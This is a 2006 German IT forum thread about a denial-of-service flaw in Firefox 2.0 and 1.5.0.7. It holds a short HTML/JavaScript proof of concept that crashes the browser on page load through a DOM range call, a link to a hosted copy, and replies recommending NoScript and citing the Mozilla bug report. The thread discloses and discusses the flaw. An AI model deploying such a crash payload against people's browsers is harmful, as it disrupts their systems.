Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

FLAW in Firefox 2.0 und 1.5.0.7

Frage Sicherheit

Mitglied: gnarff

gnarff (Level 2) - Jetzt verbinden

02.11.2006, aktualisiert 26.03.2012, 4718 Aufrufe, 2 Kommentare

Eine Schwachstelle in den o.g. genannten Versionen des beliebten Firefoxbrowsers ermoeglicht Denial of Service und u.U. die Ausfuehrung von Remote Code.

Hallo liebe Gemeinde!

Einfach mal auf diesen Link klicken, Browser wird sofort abgeschossen.

PoC hier: http://werterxyz.altervista.org/Firefox2Range.htm
01.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> 
02.
<html> 
03.
<head> 
04.
<script type="text/javascript"> 
05.
function do_crash() 
06.
07.
var range; 
08.
 
09.
range = document.createRange(); 
10.
range.selectNode(document.firstChild); 
11.
range.createContextualFragment('<span></span>'); 
12.
13.
</script> 
14.
</head> 
15.
<body onload="do_crash()"> 
16.
<p>Good bye Firefox!</p> 
17.
</body> 
18.
</html>
[31.10.2006, 03:14 am, von "xxxx"]

saludos
gnarff
Mitglied: 11078
02.11.2006 um 08:14 Uhr
Hallo,

nein, stürzt nicht ab. Javascript habe ich nämlich schon lange nicht mehr aktiviert und das kann man nur jedem raten. Beziehungsweise um es differenzierter abzuschalten:

http://www.erweiterungen.de/detail/NoScript/


Gruß,
Tim
Bitte warten ..
Mitglied: gnarff
02.11.2006 um 12:54 Uhr
hallo tim
Hallo,

nein, stürzt nicht ab. Javascript habe
ich nämlich schon lange nicht mehr
aktiviert und das kann man nur jedem raten.
ja, aber der bug im code bleibt trotzallem unbehoben:
https://bugzilla.mozilla.org/show_bug.cgi?id=358797

Beziehungsweise um es differenzierter
abzuschalten:

http://www.erweiterungen.de/detail/NoScript/

gute idee, diese erweiterung kannte ich noch nicht...

Gruß,
Tim

saludos
gnarff
Bitte warten ..
Ähnliche Inhalte
Webentwicklung
Wie kann man sich im Browser die HTTP 2.0 Header anschauen? (1)

Frage von Codehunter zum Thema Webentwicklung ...

Grafikkarten & Monitore
PC 3.0 in PCI 2.0 Slot (8)

Frage von uridium69 zum Thema Grafikkarten & Monitore ...

Windows Server
FireFox AppCrash

Frage von joerg zum Thema Windows Server ...

Webbrowser
gelöst Webcam im Firefox wieder aktivieren - jit.si (2)

Frage von itebob zum Thema Webbrowser ...

Neue Wissensbeiträge
Humor (lol)

Taschenrechner in IOS kaputt!

(7)

Information von Lochkartenstanzer zum Thema Humor (lol) ...

Sicherheit

Kanadischer Geheimdienst veröffentlicht erstmals Sicherheitssoftware

(3)

Information von BassFishFox zum Thema Sicherheit ...

Virtualisierung

Docker Monitoring und Steuerung per "sen"

Tipp von Frank zum Thema Virtualisierung ...

Heiß diskutierte Inhalte
Windows 7
Abbruch bei Brennvorgang (26)

Frage von Simulant zum Thema Windows 7 ...

Router & Routing
Externe IP von innen erreichbar machen (17)

Frage von Windows10Gegner zum Thema Router & Routing ...

Firewall
WIndows 7 RDP Massen Angriff (17)

Frage von Motte990 zum Thema Firewall ...

Windows Server
Vhdx-Datei viel größer als Inhalt der Festplatte - wie schrumpfen? (15)

Frage von Winfried-HH zum Thema Windows Server ...